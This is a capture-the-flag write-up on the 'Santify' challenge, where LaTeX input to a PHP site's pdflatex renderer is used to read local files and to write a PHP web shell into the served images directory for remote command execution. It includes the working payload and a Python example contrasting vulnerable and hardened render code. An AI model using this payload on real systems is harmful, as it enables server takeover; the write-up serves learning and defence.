./dr3dd

37C3 Potluck CTF 2023 - Santify


Santify

This week, I participated in the 37C3 Potluck CTF and solved a few challenges, among which I particularly enjoyed the Santify challenge. Therefore, I decided to write a blog post about it.

Challenge Description

[challenge screenshot]

The challenge’s backend is written in PHP and includes the following functionalities:

  1. User Login/Registration.
  2. Create a gift card that supports Markdown/LaTeX for mathematical expressions.
  3. Send gift cards to other users or to yourself.

While creating a gift card with some LaTeX expressions in it, I encountered the following error:

[error screenshot]

Here’s what I figured out from the error:

  1. It takes the user input and places it inside a LaTeX file, latex.tex, between inline-math delimiters, like this:

     \documentclass[18pt]{article}
     \thispagestyle{empty}
     \begin{document}
     ${user input}$
     \end{document}
    
  2. Then, it uses pdflatex to compile the LaTeX file and convert it into a PDF/PNG in a specific output directory.
  3. As the error shows, the backend runs this command:
    timeout 10 pdflatex -no-shell-escape -interaction=nonstopmode -output-directory /app/images/a8780fmandpjqbfppogg /app/images/a8780fmandpjqbfppogg/latex.tex
  4. The -no-shell-escape flag means shell commands cannot be run directly with \immediate\write18{cat flag.txt}; the log file reports the command as “disabled”.
  5. However, local files can still be read with \input{/etc/passwd}: shell escape only governs command execution, not TeX's own file reads. [error screenshots]
  6. But including the flag file with \input{/app/flag.txt} gave this message: [error screenshot]
  7. This suggests that a simple LFI (Local File Inclusion) will not be sufficient; the flag has to be obtained by running the /app/readflag binary, which means escalating to RCE (Remote Code Execution).
  8. I first tried various ways of executing commands taken from the official LaTeX documentation, but none of them worked. The breakthrough came from the fact that the backend is PHP: if LaTeX could write a PHP file into the same web-served directory as the PDF/PNG, the web server would execute it.
  9. So I searched for a way to create an arbitrary file with controlled content from LaTeX and found this:

      \newwrite\mytextfile
      \immediate\openout\mytextfile=abc.txt
      \immediate\write\mytextfile{hello}
    
  10. This created abc.txt in the images directory. -no-shell-escape does not restrict \openout at all; what TeX may write is governed by the separate openout_any setting in texmf.cnf, whose default “p” (paranoid) blocks absolute and parent-directory paths but allows a plain relative name like abc.txt:
    http://challenge15.play.potluckctf.com:31337/images/9fc7o182n43naghibl5h/abc.txt

  11. Now it is time to create a PHP web shell. Final payload:

        $\leftarrow$
        \newwrite\mytextfile
        \immediate\openout\mytextfile=abc.php
        \immediate\write\mytextfile{<?php echo system($_GET['cmd']);?>}
        $\leftarrow$
    
  12. It created abc.php in the same directory; because the writes are \immediate, the file is written as soon as pdflatex expands those lines, whether or not the rest of the compilation succeeds. Time to run the /app/readflag binary: http://challenge15.play.potluckctf.com:31337/images/9fc7o182n43naghibl5h/abc.php?cmd=/app/readflag [screenshot]
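To make the two halves of the bug concrete, here is the render flow rebuilt in Python as an added example (my code, not the challenge's): the vulnerable variant compiles straight into the web-served images directory, exactly as the command line above does, and the hardened variant compiles in a private temporary directory, pins kpathsea's openin_any/openout_any to paranoid, and copies only .pdf/.png artifacts out. The function names, the public/images layout and the reject list are my assumptions. The reject list on its own is not a fix, since TeX can assemble control words at run time; the directory separation is what actually closes the hole.

```python
"""Added example, not the challenge's own code: the pdflatex render flow from
the write-up rebuilt in Python, once as the challenge did it and once hardened.
Function names, the directory layout and the reject list are my assumptions."""
import os
import re
import secrets
import shutil
import subprocess
import tempfile
from pathlib import Path

# The wrapper the write-up reconstructed from the error message.
TEMPLATE_HEAD = ("\\documentclass[18pt]{article}\n"
                 "\\thispagestyle{empty}\n"
                 "\\begin{document}\n")
TEMPLATE_TAIL = "\\end{document}\n"

# Same flags as the command line in the write-up.
PDFLATEX = ["timeout", "10", "pdflatex", "-no-shell-escape",
            "-interaction=nonstopmode"]

# Control words that read or write files, or can build other control words
# at run time. A reject list is a speed bump, not a boundary: it only backs
# up the directory separation in render_hardened().
REJECT = re.compile(
    r"\\(write|openout|newwrite|openin|read|input|include|InputIfFileExists"
    r"|csname|catcode|scantokens)(?![A-Za-z])")

# Only rendered artifacts may reach the web root; latex.tex, .log, .aux and
# anything \openout dropped beside them (abc.php in the write-up) stay behind.
PUBLISHABLE_SUFFIXES = {".pdf", ".png"}


def build_tex(user_input: str) -> str:
    """Inline the expression between $...$ exactly as the backend did."""
    return f"{TEMPLATE_HEAD}${user_input}$\n{TEMPLATE_TAIL}"


def prefilter(user_input: str):
    """Return the first rejected control word, or None if the input is clean."""
    m = REJECT.search(user_input)
    return m.group(0) if m else None


def publishable(names):
    """Filter a directory listing down to artifacts safe to copy to the web root."""
    return sorted(n for n in names
                  if Path(n).suffix.lower() in PUBLISHABLE_SUFFIXES
                  and Path(n).name == n)          # no path components


def render_vulnerable(user_input: str, public_dir: str) -> Path:
    """How the challenge did it: compile straight into the web-served images
    directory, so whatever \\openout writes is served, and with PHP, executed."""
    out = Path(public_dir) / secrets.token_hex(10)
    out.mkdir(parents=True)
    (out / "latex.tex").write_text(build_tex(user_input))
    subprocess.run(PDFLATEX + ["-output-directory", str(out), str(out / "latex.tex")],
                   capture_output=True)
    return out


def render_hardened(user_input: str, public_dir: str) -> Path:
    """Compile in a private directory, restrict kpathsea file access, and copy
    only the rendered artifacts into the web root."""
    bad = prefilter(user_input)
    if bad is not None:
        raise ValueError(f"rejected control word {bad}")
    dest = Path(public_dir) / secrets.token_hex(10)
    with tempfile.TemporaryDirectory() as work:       # never web-served
        src = Path(work) / "latex.tex"
        src.write_text(build_tex(user_input))
        # kpathsea honours these as environment overrides of texmf.cnf:
        # "p" (paranoid) refuses absolute and parent-directory paths, so
        # \input{/etc/passwd} fails even though -no-shell-escape would not stop it.
        env = dict(os.environ, openin_any="p", openout_any="p")
        subprocess.run(PDFLATEX + ["-output-directory", work, str(src)],
                       env=env, capture_output=True, timeout=15)
        dest.mkdir(parents=True)
        for name in publishable(os.listdir(work)):
            shutil.copy(Path(work) / name, dest / name)
    return dest


if __name__ == "__main__":
    # The write-up's final payload, reused here as the sample input.
    payload = ("$\\leftarrow$\n\\newwrite\\f\n\\immediate\\openout\\f=abc.php\n"
               "\\immediate\\write\\f{<?php echo system($_GET['cmd']);?>}\n$\\leftarrow$")
    print("prefilter rejects:", prefilter(payload))
    if shutil.which("pdflatex") and shutil.which("timeout"):
        d = render_vulnerable(payload, "public/images")
        print("vulnerable run left behind:", sorted(os.listdir(d)))
```

Even with render_hardened in place, the directory the artifacts are copied into should be served by a location that never hands files to the PHP interpreter; the allow-list on suffixes is what keeps abc.php out of the web root, and the private work directory is what keeps it off disk where the web server can see it.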

flag : potluck{christmas_brings_the _categories _together}
